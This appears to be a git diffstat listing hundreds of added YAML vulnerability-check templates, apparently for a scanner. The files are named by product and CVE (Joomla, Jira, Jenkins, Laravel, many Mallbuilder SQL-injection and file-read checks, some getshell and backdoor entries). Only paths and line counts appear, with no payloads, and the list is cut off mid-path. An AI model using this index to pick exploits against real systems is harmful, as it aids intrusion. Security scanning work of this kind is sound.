.../CVE-2020-4463.yaml | 58 + .../CVE-2018-10956.yaml | 32 + .../IceWarp Mail Server/CVE-2015-1503.yaml | 32 + .../IceWarp Mail Server/CVE-2019-12593.yaml | 36 + .../IceWarp Mail Server/CVE-2020-27982.yaml | 35 + .../IceWarp WebMail Server/CVE-2020-8512.yaml | 52 + .../51pwn/yaml/ImpressCMS/CVE-2021-26598.yaml | 75 + .../unauthenticated-influxdb.yaml" | 32 + .../CVE-2017-4011.yaml" | 34 + .../Intelbras IWR 3000N/CVE-2021-3017.yaml | 60 + .../CVE-2000-0114.yaml" | 26 + .../CVE-2017-7269.yaml" | 35 + .../yaml/Ivanti Avalanche/CVE-2021-30497.yaml | 29 + .../JCMS-DBCONFIG-FILEREAD.yaml" | 31 + .../JCMS-Downfile_Jsp-SQLi.yaml" | 39 + .../JCMS-Import_Jsp-FileUpload.yaml" | 64 + .../JCMS-Index_Jsp-SQLi.yaml" | 35 + .../JCMS-JCMSopr_Domsg_JSP-SQLi.yaml" | 39 + .../JCMS-M_5_b-XSS.yaml" | 32 + .../JCMS-Opr_Datacall_Jsp-SQLi.yaml" | 36 + .../JCMS-Opr_Wap_Col_Jsp-SQLi.yaml" | 34 + .../JCMS-Que_Dictionary_Jsp-SQLi.yaml" | 36 + .../JCMS-Que_Flow_Jsp-SQLi.yaml" | 44 + .../JCMS-Que_Model_JSP-Unauth.yaml" | 28 + .../JCMS-Que_Recemsg_Jsp-SQLi.yaml" | 36 + .../JCMS-Selectx_List_JSP-SQLi.yaml" | 34 + ...-lm_sys_opr_uploadimg_JSP-FileUpload.yaml" | 56 + ...CMS-m_1_9_user_Down_Jsp-FileDownload.yaml" | 34 + .../JCMS-opr_classajax_SQLi.yaml" | 34 + .../Jcms-Ldap-SecretKeyLeak.yaml" | 31 + ...Jcms-module_voting_down-FileDownload.yaml" | 34 + .../Lm-FileRead.yaml" | 37 + .../VC-Coltop_Interface_JSP-SQLi.yaml" | 35 + ...Columncount_Downfile_JSP-FileInclude.yaml" | 31 + ...e_Styletop_Arttop_interface_JSP-SQLi.yaml" | 39 + .../VC-Que_Style_Coltop_JSP-SQLi.yaml" | 37 + .../VC-VerifyCodeServlet-Unauth.yaml" | 46 + .../VC-opr_copycode_jsp-SQLi.yaml" | 35 + config/51pwn/yaml/JEESNS/CVE-2020-19282.yaml | 35 + config/51pwn/yaml/JEESNS/CVE-2020-19283.yaml | 35 + config/51pwn/yaml/JEESNS/CVE-2020-19295.yaml | 35 + .../51pwn/yaml/Java EE/CVE-2017-1000486.yaml | 34 + config/51pwn/yaml/Jboss/CVE-2010-1871.yaml | 28 + config/51pwn/yaml/Jboss/CVE-2017-12149.yaml | 40 + .../yaml/Jboss/jboss-seam-debug-page.yaml | 35 + .../51pwn/yaml/Jboss/jboss-web-console.yaml | 30 + config/51pwn/yaml/Jboss/jmx-console.yaml | 24 + .../51pwn/yaml/Jboss/jmx-default-login.yaml | 44 + config/51pwn/yaml/Jeedom/CVE-2020-9036.yaml | 49 + .../51pwn/yaml/Jellyfin/CVE-2021-21402.yaml | 55 + .../51pwn/yaml/Jellyfin/CVE-2021-29490.yaml | 35 + .../51pwn/yaml/Jenkins/CVE-2018-1000600.yaml | 45 + .../51pwn/yaml/Jenkins/CVE-2018-1000861.yaml | 46 + config/51pwn/yaml/Jenkins/CVE-2019-10405.yaml | 65 + config/51pwn/yaml/Jenkins/CVE-2019-10475.yaml | 52 + config/51pwn/yaml/Jenkins/CVE-2020-2096.yaml | 55 + config/51pwn/yaml/Jenkins/CVE-2020-2103.yaml | 65 + config/51pwn/yaml/Jenkins/CVE-2020-2140.yaml | 52 + .../Jenkins/jenkins-unauthorized-access.yaml | 28 + .../yaml/Jenkins/jenkins-weak-password.yaml | 45 + .../51pwn/yaml/Jenzabar/CVE-2021-26723.yaml | 51 + config/51pwn/yaml/Jetty/CVE-2015-2080.yaml | 46 + config/51pwn/yaml/Jetty/CVE-2021-28164.yaml | 50 + config/51pwn/yaml/Jetty/CVE-2021-28169.yaml | 50 + config/51pwn/yaml/Jetty/CVE-2021-34429.yaml | 59 + .../Jinher oa/jinher-oa-default-login.yaml | 49 + config/51pwn/yaml/Jira/CVE-2007-0885.yaml | 44 + config/51pwn/yaml/Jira/CVE-2017-9506.yaml | 51 + config/51pwn/yaml/Jira/CVE-2018-5230.yaml | 38 + config/51pwn/yaml/Jira/CVE-2019-11581.yaml | 60 + config/51pwn/yaml/Jira/CVE-2019-3401.yaml | 39 + config/51pwn/yaml/Jira/CVE-2019-3402.yaml | 46 + config/51pwn/yaml/Jira/CVE-2019-3403.yaml | 33 + config/51pwn/yaml/Jira/CVE-2019-8442.yaml | 41 + config/51pwn/yaml/Jira/CVE-2019-8446.yaml | 50 + config/51pwn/yaml/Jira/CVE-2019-8449.yaml | 45 + config/51pwn/yaml/Jira/CVE-2019-8451.yaml | 52 + config/51pwn/yaml/Jira/CVE-2020-14179.yaml | 43 + config/51pwn/yaml/Jira/CVE-2020-14181.yaml | 42 + config/51pwn/yaml/Jira/CVE-2020-29453.yaml | 45 + config/51pwn/yaml/Jira/CVE-2020-36289.yaml | 53 + config/51pwn/yaml/Jira/CVE-2021-26086.yaml | 49 + config/51pwn/yaml/Jira/CVE-2022-0540.yaml | 48 + .../51pwn/yaml/Jolokia/CVE-2018-1000129.yaml | 40 + .../51pwn/yaml/Jolokia/CVE-2018-1000130.yaml | 39 + config/51pwn/yaml/Joomla/CVE-2007-4504.yaml | 33 + config/51pwn/yaml/Joomla/CVE-2008-4668.yaml | 33 + config/51pwn/yaml/Joomla/CVE-2008-4764.yaml | 33 + config/51pwn/yaml/Joomla/CVE-2008-6080.yaml | 34 + config/51pwn/yaml/Joomla/CVE-2008-6172.yaml | 33 + config/51pwn/yaml/Joomla/CVE-2008-6222.yaml | 33 + config/51pwn/yaml/Joomla/CVE-2009-1496.yaml | 33 + config/51pwn/yaml/Joomla/CVE-2009-2015.yaml | 34 + config/51pwn/yaml/Joomla/CVE-2009-2100.yaml | 33 + config/51pwn/yaml/Joomla/CVE-2009-3053.yaml | 33 + config/51pwn/yaml/Joomla/CVE-2009-3318.yaml | 33 + config/51pwn/yaml/Joomla/CVE-2009-4202.yaml | 33 + config/51pwn/yaml/Joomla/CVE-2009-4679.yaml | 33 + config/51pwn/yaml/Joomla/CVE-2010-0157.yaml | 33 + config/51pwn/yaml/Joomla/CVE-2010-0467.yaml | 33 + config/51pwn/yaml/Joomla/CVE-2010-0696.yaml | 33 + config/51pwn/yaml/Joomla/CVE-2010-0759.yaml | 32 + config/51pwn/yaml/Joomla/CVE-2010-0942.yaml | 33 + config/51pwn/yaml/Joomla/CVE-2010-0943.yaml | 35 + config/51pwn/yaml/Joomla/CVE-2010-0944.yaml | 35 + config/51pwn/yaml/Joomla/CVE-2010-0972.yaml | 35 + config/51pwn/yaml/Joomla/CVE-2010-0982.yaml | 35 + config/51pwn/yaml/Joomla/CVE-2010-0985.yaml | 35 + config/51pwn/yaml/Joomla/CVE-2010-1056.yaml | 35 + config/51pwn/yaml/Joomla/CVE-2010-1081.yaml | 35 + config/51pwn/yaml/Joomla/CVE-2010-1217.yaml | 35 + config/51pwn/yaml/Joomla/CVE-2010-1219.yaml | 33 + config/51pwn/yaml/Joomla/CVE-2010-1302.yaml | 35 + config/51pwn/yaml/Joomla/CVE-2010-1304.yaml | 35 + config/51pwn/yaml/Joomla/CVE-2010-1305.yaml | 35 + config/51pwn/yaml/Joomla/CVE-2010-1306.yaml | 36 + config/51pwn/yaml/Joomla/CVE-2010-1307.yaml | 35 + config/51pwn/yaml/Joomla/CVE-2010-1308.yaml | 35 + config/51pwn/yaml/Joomla/CVE-2010-1312.yaml | 33 + config/51pwn/yaml/Joomla/CVE-2010-1313.yaml | 35 + config/51pwn/yaml/Joomla/CVE-2010-1314.yaml | 35 + config/51pwn/yaml/Joomla/CVE-2010-1315.yaml | 35 + config/51pwn/yaml/Joomla/CVE-2010-1340.yaml | 35 + config/51pwn/yaml/Joomla/CVE-2010-1345.yaml | 35 + config/51pwn/yaml/Joomla/CVE-2010-1352.yaml | 35 + config/51pwn/yaml/Joomla/CVE-2010-1353.yaml | 35 + config/51pwn/yaml/Joomla/CVE-2010-1354.yaml | 24 + config/51pwn/yaml/Joomla/CVE-2010-1461.yaml | 35 + config/51pwn/yaml/Joomla/CVE-2010-1469.yaml | 34 + config/51pwn/yaml/Joomla/CVE-2010-1470.yaml | 34 + config/51pwn/yaml/Joomla/CVE-2010-1471.yaml | 34 + config/51pwn/yaml/Joomla/CVE-2010-1472.yaml | 34 + config/51pwn/yaml/Joomla/CVE-2010-1473.yaml | 34 + config/51pwn/yaml/Joomla/CVE-2010-1474.yaml | 34 + config/51pwn/yaml/Joomla/CVE-2010-1475.yaml | 34 + config/51pwn/yaml/Joomla/CVE-2010-1476.yaml | 34 + config/51pwn/yaml/Joomla/CVE-2010-1478.yaml | 34 + config/51pwn/yaml/Joomla/CVE-2010-1491.yaml | 34 + config/51pwn/yaml/Joomla/CVE-2010-1494.yaml | 34 + config/51pwn/yaml/Joomla/CVE-2010-1495.yaml | 35 + config/51pwn/yaml/Joomla/CVE-2010-1531.yaml | 34 + config/51pwn/yaml/Joomla/CVE-2010-1532.yaml | 34 + config/51pwn/yaml/Joomla/CVE-2010-1533.yaml | 34 + config/51pwn/yaml/Joomla/CVE-2010-1534.yaml | 35 + config/51pwn/yaml/Joomla/CVE-2010-1535.yaml | 34 + config/51pwn/yaml/Joomla/CVE-2010-1540.yaml | 34 + config/51pwn/yaml/Joomla/CVE-2010-1601.yaml | 34 + config/51pwn/yaml/Joomla/CVE-2010-1602.yaml | 34 + config/51pwn/yaml/Joomla/CVE-2010-1603.yaml | 34 + config/51pwn/yaml/Joomla/CVE-2010-1607.yaml | 34 + config/51pwn/yaml/Joomla/CVE-2010-1653.yaml | 34 + config/51pwn/yaml/Joomla/CVE-2010-1657.yaml | 34 + config/51pwn/yaml/Joomla/CVE-2010-1658.yaml | 34 + config/51pwn/yaml/Joomla/CVE-2010-1659.yaml | 34 + config/51pwn/yaml/Joomla/CVE-2010-1714.yaml | 34 + config/51pwn/yaml/Joomla/CVE-2010-1715.yaml | 34 + config/51pwn/yaml/Joomla/CVE-2010-1717.yaml | 34 + config/51pwn/yaml/Joomla/CVE-2010-1718.yaml | 34 + config/51pwn/yaml/Joomla/CVE-2010-1719.yaml | 34 + config/51pwn/yaml/Joomla/CVE-2010-1722.yaml | 34 + config/51pwn/yaml/Joomla/CVE-2010-1723.yaml | 34 + config/51pwn/yaml/Joomla/CVE-2010-1858.yaml | 34 + config/51pwn/yaml/Joomla/CVE-2010-1875.yaml | 34 + config/51pwn/yaml/Joomla/CVE-2010-1878.yaml | 34 + config/51pwn/yaml/Joomla/CVE-2010-1952.yaml | 34 + config/51pwn/yaml/Joomla/CVE-2010-1953.yaml | 34 + config/51pwn/yaml/Joomla/CVE-2010-1954.yaml | 34 + config/51pwn/yaml/Joomla/CVE-2010-1955.yaml | 34 + config/51pwn/yaml/Joomla/CVE-2010-1956.yaml | 34 + config/51pwn/yaml/Joomla/CVE-2010-1957.yaml | 34 + config/51pwn/yaml/Joomla/CVE-2010-1977.yaml | 34 + config/51pwn/yaml/Joomla/CVE-2010-1979.yaml | 32 + config/51pwn/yaml/Joomla/CVE-2010-1980.yaml | 32 + config/51pwn/yaml/Joomla/CVE-2010-1981.yaml | 32 + config/51pwn/yaml/Joomla/CVE-2010-1982.yaml | 32 + config/51pwn/yaml/Joomla/CVE-2010-1983.yaml | 32 + config/51pwn/yaml/Joomla/CVE-2010-2033.yaml | 32 + config/51pwn/yaml/Joomla/CVE-2010-2034.yaml | 32 + config/51pwn/yaml/Joomla/CVE-2010-2035.yaml | 32 + config/51pwn/yaml/Joomla/CVE-2010-2036.yaml | 32 + config/51pwn/yaml/Joomla/CVE-2010-2037.yaml | 32 + config/51pwn/yaml/Joomla/CVE-2010-2045.yaml | 32 + config/51pwn/yaml/Joomla/CVE-2010-2050.yaml | 32 + config/51pwn/yaml/Joomla/CVE-2010-2122.yaml | 32 + config/51pwn/yaml/Joomla/CVE-2010-2128.yaml | 32 + config/51pwn/yaml/Joomla/CVE-2010-2259.yaml | 32 + config/51pwn/yaml/Joomla/CVE-2010-2507.yaml | 32 + config/51pwn/yaml/Joomla/CVE-2010-2680.yaml | 32 + config/51pwn/yaml/Joomla/CVE-2010-2682.yaml | 32 + config/51pwn/yaml/Joomla/CVE-2010-2857.yaml | 32 + config/51pwn/yaml/Joomla/CVE-2010-2918.yaml | 32 + config/51pwn/yaml/Joomla/CVE-2010-2920.yaml | 32 + config/51pwn/yaml/Joomla/CVE-2010-3203.yaml | 32 + config/51pwn/yaml/Joomla/CVE-2010-3426.yaml | 32 + config/51pwn/yaml/Joomla/CVE-2010-4282.yaml | 32 + config/51pwn/yaml/Joomla/CVE-2010-4617.yaml | 32 + config/51pwn/yaml/Joomla/CVE-2010-4719.yaml | 32 + config/51pwn/yaml/Joomla/CVE-2010-4769.yaml | 32 + config/51pwn/yaml/Joomla/CVE-2010-4977.yaml | 32 + config/51pwn/yaml/Joomla/CVE-2010-5028.yaml | 32 + config/51pwn/yaml/Joomla/CVE-2010-5286.yaml | 28 + config/51pwn/yaml/Joomla/CVE-2011-4804.yaml | 32 + config/51pwn/yaml/Joomla/CVE-2015-7297.yaml | 32 + config/51pwn/yaml/Joomla/CVE-2017-8917.yaml | 32 + config/51pwn/yaml/Joomla/CVE-2018-17254.yaml | 34 + config/51pwn/yaml/Joomla/CVE-2018-6008.yaml | 32 + config/51pwn/yaml/Joomla/CVE-2020-23972.yaml | 62 + config/51pwn/yaml/Joomla/CVE-2021-28377.yaml | 32 + .../yaml/Joomla/Joomla-Database-download.yaml | 50 + .../Joomla/Joomla-LFD-s5_media_player.yaml | 37 + .../yaml/Joomla/Joomla-SQLi-com_rbids.yaml | 37 + .../yaml/Joomla/Joomla-Upload-media.yaml | 43 + .../yaml/Joomla/Joomla-lfd-cckjseblod.yaml | 37 + .../Joomla/Joomla-lfd-contushdvideoshare.yaml | 39 + .../Joomla/Joomla-lfi-com_joomanager.yaml | 36 + .../51pwn/yaml/Joomla/Joomla-sqli-aceftp.yaml | 36 + .../Joomla/Joomla-sqli-com_blog_calendar.yaml | 37 + .../Joomla/Joomla-sqli-com_ebcontent.yaml | 39 + .../yaml/Joomla/Joomla-sqli-com_fastball.yaml | 40 + .../yaml/Joomla/Joomla-sqli-com_fields.yaml | 41 + .../Joomla/Joomla-sqli-com_gallery_wd.yaml | 51 + .../Joomla/Joomla-sqli-com_jobgroklist.yaml | 39 + .../yaml/Joomla/Joomla-sqli-com_rand.yaml | 40 + .../yaml/Joomla/Joomla-sqli-com_rpl.yaml | 39 + .../Joomla/Joomla-sqli-com_sponsorwall.yaml | 40 + .../yaml/Joomla/Joomla-sqli-com_training.yaml | 39 + .../Joomla/Joomla-sqli-com_vikbooking.yaml | 38 + .../yaml/Joomla/Joomla-sqli-googlesearch.yaml | 33 + .../Joomla/Joomla-sqli-registrationpro.yaml | 38 + .../yaml/Joomla/Joomla-upload-com_myblog.yaml | 52 + config/51pwn/yaml/Joomla/exploits-14263.yaml | 38 + config/51pwn/yaml/Joomla/exploits-20343.yaml | 38 + config/51pwn/yaml/Joomla/exploits-22403.yaml | 38 + config/51pwn/yaml/Joomla/exploits-34637.yaml | 40 + config/51pwn/yaml/Joomla/exploits-34754.yaml | 40 + config/51pwn/yaml/Joomla/exploits-35220.yaml | 38 + config/51pwn/yaml/Joomla/exploits-35246.yaml | 36 + config/51pwn/yaml/Joomla/exploits-37620.yaml | 37 + config/51pwn/yaml/Joomla/exploits-37773.yaml | 38 + config/51pwn/yaml/Joomla/exploits-37774.yaml | 38 + config/51pwn/yaml/Joomla/exploits-39879.yaml | 38 + config/51pwn/yaml/Joomla/exploits-41322.yaml | 37 + config/51pwn/yaml/Joomla/exploits-41323.yaml | 37 + config/51pwn/yaml/Joomla/exploits-41327.yaml | 37 + config/51pwn/yaml/Joomla/exploits-41328.yaml | 37 + config/51pwn/yaml/Joomla/exploits-41362.yaml | 39 + config/51pwn/yaml/Joomla/exploits-41368.yaml | 37 + config/51pwn/yaml/Joomla/exploits-41371.yaml | 37 + config/51pwn/yaml/Joomla/exploits-41372.yaml | 37 + config/51pwn/yaml/Joomla/exploits-41379.yaml | 37 + .../51pwn/yaml/Joomla/exploits-41384_2.yaml | 37 + config/51pwn/yaml/Joomla/exploits-41385.yaml | 39 + config/51pwn/yaml/Joomla/exploits-41386.yaml | 37 + config/51pwn/yaml/Joomla/exploits-41388.yaml | 37 + config/51pwn/yaml/Joomla/exploits-41399.yaml | 37 + config/51pwn/yaml/Joomla/exploits-41496.yaml | 39 + config/51pwn/yaml/Joomla/exploits-41500.yaml | 37 + config/51pwn/yaml/Joomla/exploits-44160.yaml | 37 + config/51pwn/yaml/Joomla/exploits-45476.yaml | 43 + config/51pwn/yaml/Joomla/exploits-45930.yaml | 37 + config/51pwn/yaml/Joomla/exploits-46219.yaml | 35 + config/51pwn/yaml/Joomla/exploits-46225.yaml | 40 + config/51pwn/yaml/Joomla/exploits-46227.yaml | 41 + config/51pwn/yaml/Joomla/exploits-46228.yaml | 41 + config/51pwn/yaml/Joomla/exploits-46229.yaml | 37 + config/51pwn/yaml/Joomla/exploits-47249.yaml | 40 + .../yaml/Joomla/joomla-com-fabrik-lfi.yaml | 36 + .../yaml/Joomla/joomla-config-dist-file.yaml | 35 + .../yaml/Joomla/joomla-file-listing.yaml | 31 + .../yaml/Joomla/joomla-htaccess-file.yaml | 34 + .../yaml/Joomla/joomla-jvehicles-lfi.yaml | 32 + .../yaml/Joomla/joomla-manifest-file.yaml | 34 + config/51pwn/yaml/Joomla/joomla-sqli-K2.yaml | 37 + .../yaml/Joomla/joomla-sqli-com_fss.yaml | 38 + .../yaml/Joomla/joomla-sqli-com_job.yaml | 38 + .../Joomla/joomla-sqli-com_jobprofile.yaml | 38 + .../Joomla/joomla-sqli-com_pccookbook.yaml | 38 + .../yaml/Joomla/joomla-sqli-com_people.yaml | 39 + .../yaml/Joomla/joomla-sqli-com_redshop.yaml | 38 + .../Joomla/joomla-sqli-com_s5clanroster.yaml | 38 + .../yaml/Joomla/joomla-sqli-vnmshop.yaml | 38 + .../joomla-sqli-weblinks_categories.yaml | 38 + .../joomla-unserialized-user_agent.yaml | 36 + config/51pwn/yaml/Joomla/rusty-joomla.yaml | 44 + config/51pwn/yaml/Joomla/ssvid-19358.yaml | 41 + config/51pwn/yaml/Joomla/svid-90196.yaml | 38 + .../yaml/Joyent Node.js/CVE-2014-3744.yaml | 32 + .../yaml/Joyent Node.js/CVE-2015-5688.yaml | 26 + .../yaml/Joyent Node.js/CVE-2017-14849.yaml | 33 + .../yaml/Joyent Node.js/CVE-2018-3714.yaml | 33 + .../yaml/Joyent Node.js/CVE-2021-21315.yaml | 36 + .../jumpserver-unauth-rce.yaml" | 45 + .../yaml/Jupyter/jupyter-ipython-unauth.yaml | 33 + .../jupyter-notebook-UnauthorizedAccess.yaml | 33 + config/51pwn/yaml/KLog/CVE-2020-35729.yaml | 47 + config/51pwn/yaml/KONGA/CVE-2021-44103.yaml | 72 + config/51pwn/yaml/KR-Web/CVE-2009-4223.yaml | 24 + .../Kafka/kafka-center-default-login.yaml | 39 + .../51pwn/yaml/Kentico CMS/CVE-2015-7823.yaml | 22 + .../yaml/Kentico CMS/CVE-2019-10068.yaml | 56 + .../51pwn/yaml/Keycloak/CVE-2020-10770.yaml | 51 + config/51pwn/yaml/Kibana/CVE-2018-17246.yaml | 38 + config/51pwn/yaml/Kibana/CVE-2019-7609.yaml | 38 + config/51pwn/yaml/Kibana/kibana-unauth.yaml | 35 + .../51pwn/yaml/KindEditor/CVE-2019-7543.yaml | 51 + config/51pwn/yaml/Kirona/CVE-2019-17503.yaml | 57 + config/51pwn/yaml/Knowage/CVE-2021-30213.yaml | 50 + config/51pwn/yaml/Kodi/CVE-2017-5982.yaml | 24 + config/51pwn/yaml/Kong/CVE-2020-11710.yaml | 34 + config/51pwn/yaml/Kramer/CVE-2021-36356.yaml | 52 + .../kyan-credential-exposure.yaml" | 35 + config/51pwn/yaml/Kyocera/CVE-2020-23575.yaml | 48 + config/51pwn/yaml/LDAP/CVE-2021-29156.yaml | 54 + config/51pwn/yaml/LG NAS/CVE-2018-10818.yaml | 36 + .../51pwn/yaml/LISTSERV/CVE-2019-15501.yaml | 50 + .../yaml/LabKey Server/CVE-2019-3911.yaml | 35 + .../yaml/LabKey Server/CVE-2019-3912.yaml | 29 + config/51pwn/yaml/Lanproxy/CVE-2021-3019.yaml | 39 + .../51pwn/yaml/Lansweeper/CVE-2019-13462.yaml | 58 + .../51pwn/yaml/Lantronix/CVE-2021-21881.yaml | 60 + config/51pwn/yaml/Laravel/CVE-2021-3129.yaml | 82 + .../yaml/Laravel/laravel-debug-enabled.yaml | 25 + config/51pwn/yaml/Laravel/laravel-env.yaml | 48 + .../yaml/Laravel/laravel-filemanager.yaml | 33 + .../yaml/Laravel/laravel-ignition-xss.yaml | 38 + .../51pwn/yaml/Laravel/laravel-log-file.yaml | 38 + .../51pwn/yaml/Laravel/laravel-telescope.yaml | 32 + .../yaml/Layer5 Meshery/CVE-2021-31856.yaml | 53 + .../yaml/Liferay Portal/CVE-2020-7961.yaml | 65 + .../51pwn/yaml/LimeSurvey/CVE-2020-11455.yaml | 44 + .../yaml/Linear eMerge/CVE-2019-7254.yaml | 35 + .../yaml/Linear eMerge/CVE-2019-7256.yaml | 36 + .../yaml/Linksys WVC54GCA/CVE-2009-1558.yaml | 25 + config/51pwn/yaml/Linksys/CVE-2020-35713.yaml | 54 + config/51pwn/yaml/LinuxKI/CVE-2020-7209.yaml | 44 + .../51pwn/yaml/Lionwiki/CVE-2020-27191.yaml | 50 + .../yaml/LiveZilla Server/CVE-2019-12962.yaml | 56 + .../yaml/LogonTracer/CVE-2018-16167.yaml | 53 + .../yaml/Lotus Core CMS/CVE-2020-8641.yaml | 42 + .../yaml/Loytec LGATE-902/CVE-2018-14916.yaml | 47 + .../yaml/Lucee Server/CVE-2021-21307.yaml | 96 + config/51pwn/yaml/LumisXP/CVE-2021-27931.yaml | 54 + config/51pwn/yaml/MODx/CVE-2010-5278.yaml | 38 + .../mpsec-lfi.yaml" | 44 + config/51pwn/yaml/Maccms/CNVD-2018-01089.yaml | 22 + config/51pwn/yaml/Maccms/maccms-rce.yaml | 24 + .../51pwn/yaml/Maccms/maccmsv10-backdoo.yaml | 37 + .../51pwn/yaml/Maccms/maccmsv10-backdoor.yaml | 35 + config/51pwn/yaml/Magento/CVE-2015-2067.yaml | 26 + config/51pwn/yaml/Magento/CVE-2015-2068.yaml | 30 + config/51pwn/yaml/Magmi/CVE-2017-7391.yaml | 29 + config/51pwn/yaml/Magmi/CVE-2020-5776.yaml | 53 + config/51pwn/yaml/Magmi/CVE-2020-5777.yaml | 32 + .../CVE-2021-32172.yaml | 68 + .../51pwn/yaml/Majordomo/CVE-2011-0049.yaml | 26 + .../MallBuilder/Mallbuilder-404_key-SQLi.yaml | 34 + .../Mallbuilder-Change_statusPHP-SQLi.yaml | 35 + .../MallBuilder/Mallbuilder-Index-SQLi.yaml | 34 + .../Mallbuilder-List_brand-SQLi.yaml | 34 + ...lbuilder-Message_Product_Payment-SQLi.yaml | 64 + .../MallBuilder/Mallbuilder-Product-SQLi.yaml | 34 + .../Mallbuilder-Product_Shop-SQLi.yaml | 39 + .../Mallbuilder-aboutus_key-SQLi.yaml | 34 + .../Mallbuilder-aboutus_type-SQLi.yaml | 34 + .../MallBuilder/Mallbuilder-ad_name-SQLi.yaml | 34 + .../Mallbuilder-add_brand_user_id-SQLi.yaml | 34 + ...r-admin_activity_product_list_id-SQLi.yaml | 34 + .../Mallbuilder-admin_buyorder_deid-SQLi.yaml | 34 + .../Mallbuilder-admin_buyorder_id-SQLi.yaml | 34 + .../Mallbuilder-admin_deliver_id-SQLi.yaml | 34 + ...uilder-admin_logistics_temp_deid-SQLi.yaml | 34 + ...uilder-admin_logistics_temp_edit-SQLi.yaml | 34 + .../Mallbuilder-admin_member_editid-SQLi.yaml | 34 + ...Mallbuilder-admin_message_det_id-SQLi.yaml | 34 + ...er-admin_message_list_delbox_did-SQLi.yaml | 35 + ...er-admin_message_list_delbox_rid-SQLi.yaml | 35 + ...der-admin_message_list_inbox_did-SQLi.yaml | 35 + ...allbuilder-admin_message_sed_uid-SQLi.yaml | 34 + ...llbuilder-admin_product_count_id-SQLi.yaml | 34 + .../Mallbuilder-admin_receipt_id-SQLi.yaml | 34 + .../Mallbuilder-admin_return_id-SQLi.yaml | 34 + ...allbuilder-admin_security_editid-SQLi.yaml | 34 + ...allbuilder-admin_shop_consult_id-SQLi.yaml | 34 + ...allbuilder-admin_start_addr_deid-SQLi.yaml | 34 + ...Mallbuilder-admin_start_addr_fid-SQLi.yaml | 34 + .../Mallbuilder-admin_start_addr_id-SQLi.yaml | 34 + ...Mallbuilder-admin_start_addr_tid-SQLi.yaml | 34 + .../MallBuilder/Mallbuilder-adv_chk-SQLi.yaml | 35 + .../Mallbuilder-ajax_back_end_user-SQLi.yaml | 34 + .../Mallbuilder-announcement_chk-SQLi.yaml | 35 + .../Mallbuilder-announcement_delid-SQLi.yaml | 34 + ...llbuilder-announcement_detail_id-SQLi.yaml | 34 + .../Mallbuilder-bank_account_deid-SQLi.yaml | 34 + .../Mallbuilder-bank_account_mod_id-SQLi.yaml | 35 + .../Mallbuilder-bank_deid-SQLi.yaml | 34 + .../Mallbuilder-bank_name-SQLi.yaml | 35 + .../Mallbuilder-brand_cat_delid-SQLi.yaml | 34 + .../Mallbuilder-brand_cat_id-SQLi.yaml | 34 + .../Mallbuilder-brand_delid-SQLi.yaml | 34 + .../Mallbuilder-cards_chk-SQLi.yaml | 35 + .../Mallbuilder-cards_delid-SQLi.yaml | 34 + .../MallBuilder/Mallbuilder-cat_key-SQLi.yaml | 34 + .../Mallbuilder-comment_id-SQLi.yaml | 34 + .../Mallbuilder-consult_k-SQLi.yaml | 34 + .../Mallbuilder-consult_key-SQLi.yaml | 34 + .../Mallbuilder-cpmod_id-SQLi.yaml | 34 + .../MallBuilder/Mallbuilder-delid-SQLi.yaml | 38 + .../Mallbuilder-fast_mail_id-SQLi.yaml | 34 + .../Mallbuilder-feedback_deid-SQLi.yaml | 34 + .../Mallbuilder-feedback_id-SQLi.yaml | 34 + .../Mallbuilder-feedbackd_id-SQLi.yaml | 34 + .../Mallbuilder-hy_feedback_key-SQLi.yaml | 34 + .../Mallbuilder-list_key-SQLi.yaml | 34 + .../Mallbuilder-list_province-SQLi.yaml | 34 + .../Mallbuilder-list_ptype-SQLi.yaml | 34 + .../Mallbuilder-list_type-SQLi.yaml | 34 + .../Mallbuilder-login_key-SQLi.yaml | 34 + .../Mallbuilder-lostpass_key-SQLi.yaml | 34 + .../Mallbuilder-lostpass_md5-SQLi.yaml | 34 + .../Mallbuilder-lostpass_userid-SQLi.yaml | 34 + .../Mallbuilder-match_id-SQLi.yaml | 34 + .../Mallbuilder-membermod_userid-SQLi.yaml | 34 + ...er-message_admin_message_sed_uid-SQLi.yaml | 34 + ...Mallbuilder-notice_template_type-SQLi.yaml | 34 + .../Mallbuilder-order_detailPHP_oid-SQLi.yaml | 34 + .../Mallbuilder-order_detail_oid-SQLi.yaml | 34 + .../Mallbuilder-orderby_key-SQLi.yaml | 34 + .../Mallbuilder-pluginphp-FileRead.yaml | 37 + .../Mallbuilder-points_cat_delid-SQLi.yaml | 34 + .../Mallbuilder-points_chk-SQLi.yaml | 35 + .../Mallbuilder-product_list_key-SQLi.yaml | 34 + .../Mallbuilder-property_chk-SQLi.yaml | 35 + .../Mallbuilder-register_key-SQLi.yaml | 34 + .../Mallbuilder-report_chk-SQLi.yaml | 35 + ...llbuilder-reserve_username_delid-SQLi.yaml | 34 + .../Mallbuilder-search_key-SQLi.yaml | 34 + .../Mallbuilder-service_fee_chk-SQLi.yaml | 35 + ...Mallbuilder-shipping_address_chk-SQLi.yaml | 35 + .../Mallbuilder-shop_cat_delid-SQLi.yaml | 34 + .../Mallbuilder-shop_consult_id-SQLi.yaml | 34 + .../Mallbuilder-shop_domin_chk-SQLi.yaml | 35 + .../Mallbuilder-shop_earnest_chk-SQLi.yaml | 35 + .../Mallbuilder-shop_grade_chk-SQLi.yaml | 35 + .../Mallbuilder-shop_template_chk-SQLi.yaml | 35 + .../Mallbuilder-smarty_config_key-SQLi.yaml | 34 + ...lbuilder-space_product_detail_id-SQLi.yaml | 34 + ...builder-space_product_detail_uid-SQLi.yaml | 34 + .../Mallbuilder-spec_chk-SQLi.yaml | 35 + .../Mallbuilder-sub_site_key-SQLi.yaml | 34 + .../Mallbuilder-tg_member_chk-SQLi.yaml | 35 + .../Mallbuilder-ucomment_id-SQLi.yaml | 34 + .../Mallbuilder-user_order_username-SQLi.yaml | 34 + ...llbuilder-user_read_rec_username-SQLi.yaml | 34 + .../MallBuilder/Mallbuilder-wap_key-SQLi.yaml | 34 + .../MallBuilder/Mallbuilder714-getshell.yaml | 32 + config/51pwn/yaml/MantisBT/CVE-2017-7615.yaml | 28 + .../51pwn/yaml/Mara CMS/CVE-2020-24223.yaml | 51 + .../yaml/MaxSite CMS/CVE-2021-35265.yaml | 51 + .../CVE-2020-7318.yaml | 53 + .../Mercusys Mercury X18G/CVE-2021-23241.yaml | 47 + .../yaml/MetInfo CMS/CNVD-2018-13393.yaml | 42 + .../yaml/MetInfo CMS/CVE-2019-16996.yaml | 52 + .../yaml/MetInfo CMS/CVE-2019-16997.yaml | 61 + .../yaml/MetInfo CMS/CVE-2019-17418.yaml | 52 + .../MetInfo 